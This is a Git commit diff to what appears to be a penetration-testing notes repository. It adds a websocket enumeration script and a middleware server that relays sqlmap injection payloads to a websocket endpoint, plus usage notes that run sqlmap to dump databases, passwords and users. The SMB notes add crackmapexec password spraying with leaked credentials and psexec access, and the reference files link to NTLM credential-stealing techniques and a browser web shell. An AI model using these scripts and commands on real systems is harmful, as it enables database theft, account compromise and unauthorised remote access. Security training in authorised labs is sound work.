whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

bump

This commit is contained in:
Stefan Friese 2023-04-17 22:49:17 +02:00
parent e1b022b76c
commit 11abafb8e6
7 changed files with 152 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

40
Enumeration/EnumScripts/websocket_enumeration.py Normal file
View File

@ -0,0 +1,40 @@
#!/usr/bin/env python3
import sys
import json
import websocket
URL_PATH = ""
if len(sys.argv) > 1:
URL_PATH = sys.argv[1]
if URL_PATH.startswith('/'):
URL_PATH = URL_PATH[1::]
WEBSOCKET_URL = f"ws://example.com:5789/{URL_PATH}"
def on_open(web_socket):
request = {
"test": "example"
}
if len(sys.argv) == 4:
request = {
f"{sys.argv[2]}": f"{sys.argv[3]}"
}
print(f"Sent:\n\n{json.dumps(request)}")
web_socket.send(json.dumps(request))
def on_message(web_socket, message):
print(f"\nReceived:\n\n{message}")
websocket_client = websocket.WebSocketApp(
WEBSOCKET_URL,
on_open=on_open,
on_message=on_message
)
websocket_client.run_forever()

19
Enumeration/SMB.md
View File

@ -23,3 +23,22 @@ smbclient -L //$TARGET_IP/ --option='client min protocol=NT1'
```sh ```sh
smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig' smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig'
``` ```
## Enumerate Domain Users
List users of the domain through leaked credentials of an SMB user
```sh
crackmapexec smb example.com -u lowperm_user -p 'securepassword!' --users
```
Continue trying the found password on the users discovered in the step before
```sh
crackmapexec smb example.com -u domain_users.txt -p 'securepassword!' --continue-on-success
```
## Enumerate Writeable SMB shares
List writeable SMB shares for found domain users via impacket's psexec
```sh
psexec.py example.com/domain.user@example.com
```

62
Exploits/Databases/Scripts/sqlmap_websocket_server.py Normal file
View File

@ -0,0 +1,62 @@
#!/usr/bin/env python3
import sys
from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection
URL_PATH = ""
if len(sys.argv) > 1:
URL_PATH = sys.argv[1]
if URL_PATH.startswith('/'):
URL_PATH = URL_PATH[1::]
WS_SERVER = f"ws://example.com:5789/{URL_PATH}"
def send_ws(payload):
ws = create_connection(WS_SERVER)
# res = ws.recv()
message = unquote(payload).replace('"', '\\"')
data = '{"version": "' + message + '"}'
ws.send(data)
res = ws.recv()
ws.close()
if res:
return res
return 0
def middleware_server(host_port, content_type="text/plain"):
class CustomHandler(SimpleHTTPRequestHandler):
def do_GET(self) -> None:
self.send_response(200)
try:
payload = urlparse(self.path).query.split('=', 1)[1]
except IndexError:
payload = False
if payload:
content = send_ws(payload)
else:
content = "No payload specified"
self.send_header("Content-Type", content_type)
self.end_headers()
self.wfile.write(content.encode())
class _TCPServer(TCPServer):
allow_reuse_address = True
httpd = _TCPServer(host_port, CustomHandler)
httpd.serve_forever()
print(f"Payload is sent to {WS_SERVER} via http://localhost:8081/?id=*")
try:
middleware_server(('0.0.0.0', 8081))
except KeyboardInterrupt:
pass

20
Exploits/Databases/Websocket SQLi.md
View File

@ -6,6 +6,26 @@
sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs sqlmap -u "http://127.0.0.1:8081/?id=62009" -p "id" --dbs
``` ```
## Usage
First, make sure ` websocket-client` is installed from PyPi.
Enumerate the websocket via [the websocket enumeration script](../../Enumeration/EnumScripts).
You may provide the URL endpoint you want to request and the key, value of the request via the arguments in the following way
```sh
websocket_enumeration.py /values key value
```
I modified the script rayhan0x01 provides so that an endpoint can set. [The modified script](./Scripts/sqlmap_websocket_server.py) is started in the following way
```sh
sqlmap_websocket_server.py /endpoint
```
Start sqlmap requesting the `sqlmap_websocket_server` on localhost port 8081
```sh
sqlmap -u "http://127.0.0.1:8081/?id=1" --batch --risk 3 --level 5 --flush-session --dump --passwords --users
```
## References ## References
* [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli) * [rayhan0x01's git repo](https://github.com/rayhan0x01/nodejs-websocket-sqli)

1
Exploits/References.md
View File

@ -62,6 +62,7 @@
[PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git) [PowerSploit](https://github.com/PowerShellMafia/PowerSploit.git)
[nishang](https://github.com/samratashok/nishang.git) [nishang](https://github.com/samratashok/nishang.git)
[hacktricks' Places to steal ntlm creds](https://book.hacktricks.xyz/windows-hardening/ntlm/places-to-steal-ntlm-creds)
# Exploits # Exploits

6
Forensics/Wireshark.md
View File

@ -12,3 +12,9 @@ tshark -r keystrokes.pcapng -Y "usb.transfer_type==0x01 and frame.len==35 and! (
python keystrokedecoder.py output.txt python keystrokedecoder.py output.txt
``` ```
## Extracting Payload sent in DNS Request
Search for the DNS requests containing the specific top level domain.
```sh
tshark -r capture.pcapng -Y 'dns && ip.dst==167.71.211.113 && (dns contains xyz)' -T fields -e dns.qry.name | awk -F '.' '{print $1}' | uniq > dns.out
```

4
Reverse Shells/References.md
View File

@ -17,3 +17,7 @@
[pentestmonkey's Reverse Shell Chea Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) [pentestmonkey's Reverse Shell Chea Sheet](https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
[Arr0way's Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/) [Arr0way's Reverse Shell Cheat Sheet](https://highon.coffee/blog/reverse-shell-cheat-sheet/)
## Pw0nyShell
Commandline Shell Inside the Browser Window is [flozz's p0wny shell](https://github.com/flozz/p0wny-shell.git)